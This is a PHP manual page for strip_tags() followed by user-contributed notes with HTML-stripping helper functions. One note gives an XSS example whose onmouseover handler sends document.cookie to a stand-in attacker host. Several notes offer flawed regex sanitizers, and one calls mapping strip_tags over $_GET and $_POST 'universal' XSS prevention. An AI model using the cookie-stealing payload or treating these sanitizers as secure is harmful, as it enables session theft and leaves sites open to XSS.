PHP 5.4.31 Released

strip_tags

(PHP 4, PHP 5)

strip_tagsStrip HTML and PHP tags from a string

Description

string strip_tags ( string $str [, string $allowable_tags ] )

This function tries to return a string with all NULL bytes, HTML and PHP tags stripped from a given str. It uses the same tag stripping state machine as the fgetss() function.

Parameters

str

The input string.

allowable_tags

You can use the optional second parameter to specify tags which should not be stripped.

Note:

HTML comments and PHP tags are also stripped. This is hardcoded and can not be changed with allowable_tags.

Note:

This parameter should not contain whitespace. strip_tags() sees a tag as a case-insensitive string between < and the first whitespace or >. It means that strip_tags("<br/>", "<br>") returns an empty string.

Return Values

Returns the stripped string.

Changelog

Version Description
5.0.0 strip_tags() is now binary safe.
4.3.0 HTML comments are now always stripped.

Examples

Example #1 strip_tags() example

<?php
$text 
'<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo 
strip_tags($text);
echo 
"\n";

// Allow <p> and <a>
echo strip_tags($text'<p><a>');
?>

The above example will output:

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can result in the removal of more text/data than expected.

Warning

This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.

Note:

Tag names within the input HTML that are greater than 1023 bytes in length will be treated as though they are invalid, regardless of the allowable_tags parameter.

See Also

add a note add a note

User Contributed Notes 17 notes

up
27
Kenji
3 months ago
A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you are introducing with such a code! Don't use it, stay safe.
up
29
CEO at CarPool2Camp dot org
5 years ago
Note the different outputs from different versions of the same tag:

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br>');
var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>
up
3
obeyer at popsugar dot com
6 months ago
actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped
up
14
mariusz.tarnaski at wp dot pl
5 years ago
Hi. I made a function that removes the HTML tags along with their contents:

Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {

 
preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
 
$tags = array_unique($tags[1]);
   
  if(
is_array($tags) AND count($tags) > 0) {
    if(
$invert == FALSE) {
      return
preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    else {
      return
preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
    }
  }
  elseif(
$invert == FALSE) {
    return
preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
  }
  return
$text;
}
?>

Sample text:
$text = '<b>sample</b> text with <div>tags</div>';

Result for strip_tags($text):
sample text with tags

Result for strip_tags_content($text):
text with

Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with

Result for strip_tags_content($text, '<b>', TRUE);
text with <div>tags</div>

I hope that someone is useful :)
up
2
mshaffer
10 months ago
Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags destroys the whole HTML behind the tags with invalid attributes. Like <img src="/images/image.jpg""> (look, there is an odd quote before >.)

So I wrote function which fixes unsafe attributes and replaces odd " and ' quotes with &quot; and &#39;.

<?php
function fix_unsafe_attributes($s) {
 
$out = false;
  while (
preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins
   
$i = $i[1][1]+1;
   
$out.= substr($s, 0, $i);
   
$s = substr($s, $i);

   
// scan attributes and find odd " and '
   
while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) &&
           ((
$i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) &&
           (((
$c = strpos($s, '>')) === false) || ($i < $c))) {

     
$c = $s{$i};
      if ((
$i < 1) || ($s{$i-1} != '=')) {
       
$out.= substr($s, 0, $i).($s{$i} == '"' ? '&quot;' : '&#39;'); // replace odd " and '
       
$s = substr($s, $i+1);
      }else {
       
$i++;
       
$out.= substr($s, 0, $i);
       
$s = substr($s, $i);

        if ((
$i = strpos($s, $c)) !== false) {
         
$i++;
         
$out.= substr($s, 0, $i);
         
$s = substr($s, $i);
        }
      }
    }
  }
  return
$out.$s;
}
?>

Maybe this function can be rewritten with simple regular expression but I have no luck to make it quickly.
up
7
bzplan at web dot de
1 year ago
a HTML code like this:

<?php
$html
= '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
'
;
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood';

notice: the words 'blue' and 'size' grow together :(
and line-breaks are still in new string $str

if you need a space between the words (and without line-break)
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood';

the function:

<?php
// --------------------------------------------------------------

function rip_tags($string) {
   
   
// ----- remove HTML TAGs -----
   
$string = preg_replace ('/<[^>]*>/', ' ', $string);
   
   
// ----- remove control characters -----
   
$string = str_replace("\r", '', $string);    // --- replace with empty space
   
$string = str_replace("\n", ' ', $string);   // --- replace with space
   
$string = str_replace("\t", ' ', $string);   // --- replace with space
   
    // ----- remove multiple spaces -----
   
$string = trim(preg_replace('/ {2,}/', ' ', $string));
   
    return
$string;

}

// --------------------------------------------------------------
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags()
... then remove control characters and multiple spaces
:)
up
12
admin at automapit dot com
7 years ago
<?php
function html2txt($document){
$search = array('@<script[^>]*?>.*?</script>@si'// Strip out javascript
              
'@<[\/\!]*?[^<>]*?>@si',            // Strip out HTML tags
              
'@<style[^>]*?>.*?</style>@siU',    // Strip style tags properly
              
'@<![\s\S]*?--[ \t\n\r]*>@'         // Strip multi-line comments including CDATA
);
$text = preg_replace($search, '', $document);
return
$text;
}
?>

This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in it's way.

It's a frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
up
2
tom at cowin dot us
3 years ago
With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it...

<?php

   
function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')
    {
       
mb_regex_encoding('UTF-8');
       
//replace MS special characters first
       
$search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');
       
$replace = array('\'', '\'', '"', '"', '-');
       
$text = preg_replace($search, $replace, $text);
       
//make sure _all_ html entities are converted to the plain ascii equivalents - it appears
        //in some MS headers, some html entities are encoded and some aren't
       
$text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');
       
//try to strip out any C style comments first, since these, embedded in html comments, seem to
        //prevent strip_tags from removing html comments (MS Word introduced combination)
       
if(mb_stripos($text, '/*') !== FALSE){
           
$text = mb_eregi_replace('#/\*.*?\*/#s', '', $text, 'm');
        }
       
//introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
        //'<1' becomes '< 1'(note: somewhat application specific)
       
$text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
       
$text = strip_tags($text, $allowed_tags);
       
//eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
       
$text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);
       
//strip out inline css and simplify style tags
       
$search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
       
$replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
       
$text = preg_replace($search, $replace, $text);
       
//on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
        //some MS Style Definitions - this last bit gets rid of any leftover comments */
       
$num_matches = preg_match_all("/\<!--/u", $text, $matches);
        if(
$num_matches){
             
$text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
        }
        return
$text;
    }
?>
up
1
bnt dot gloria at outlook dot com
14 days ago
With allowable_tags, strip-tags is not safe.

<?php

$str
= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo
$str; // DISPLAY: <p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";

?>
up
0
pietro777
1 month ago
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(11) "<br>Each<br/>New<br />Line"
up
-1
kai at froghh dot de
5 years ago
a function that decides if < is a start of a tag or a lower than / lower than + equal:

<?php
function lt_replace($str){
    return
preg_replace("/<([^[:alpha:]])/", '&lt;\\1', $str);
}
?>

It's to be used before strip_slashes.
up
-1
cesar at nixar dot org
8 years ago
Here is a recursive function for strip_tags like the one showed in the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return
is_array($value) ?
   
array_map('strip_tags_deep', $value) :
   
strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>
up
-2
salavert at~ akelos
8 years ago
<?php
      
/**
    * Works like PHP function strip_tags, but it only removes selected tags.
    * Example:
    *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
    */

   
function strip_selected_tags($text, $tags = array())
    {
       
$args = func_get_args();
       
$text = array_shift($args);
       
$tags = func_num_args() > 2 ? array_diff($args,array($text))  : (array)$tags;
        foreach (
$tags as $tag){
            if(
preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
               
$text = str_replace($found[0],$found[1],$text);
          }
        }

        return
$text;
    }

?>

Hope you find it useful,

Jose Salavert
up
-1
sERGE-01
7 months ago
My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
    $tags_allowed
= "a|b|i|s|u|br";
   
$in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";
   
   
$out_text = preg_replace('#</?(?!('.$tags_allowed.'))\b([^><]*>)#sim', "", $in_text);
   
    print
"Example 1:<br>";
    print
htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example leaves all allowed tags and screen the rest of the text with  htmlentities() function:
<?php
   
// getting all of allowed tags with their offset
   
if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
       
$out_text = "";
       
$ofs = 0;
        foreach(
$matches[0] as $tag)
        {
           
// text before allowed tag
           
$out_text .= htmlentities(substr($in_text,$ofs,$tag[1]-$ofs), ENT_NOQUOTES, "cp1251");
           
$out_text .= $tag[0]; // next allowed tag
           
$ofs = $tag[1] + strlen($tag[0]);
        }
       
// adding end of text
       
$out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251");
    }

    print
"Example 2:<br>";
    print
htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------
up
-2
sERGE-01
7 months ago
Fix for my Example2.
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
    $out_text
= "";
   
$ofs = 0;
    if(
preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        foreach(
$matches[0] as $tag)
        {
           
$out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
           
$out_text .= $tag[0];
           
$ofs = $tag[1] + strlen($tag[0]);
        }
    }
   
$out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>
up
-5
andy
4 months ago
<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>
up
-18
brettz9 AAT yah
5 years ago
Works on shortened <?...?> syntax and thus also will remove XML processing instructions.
To Top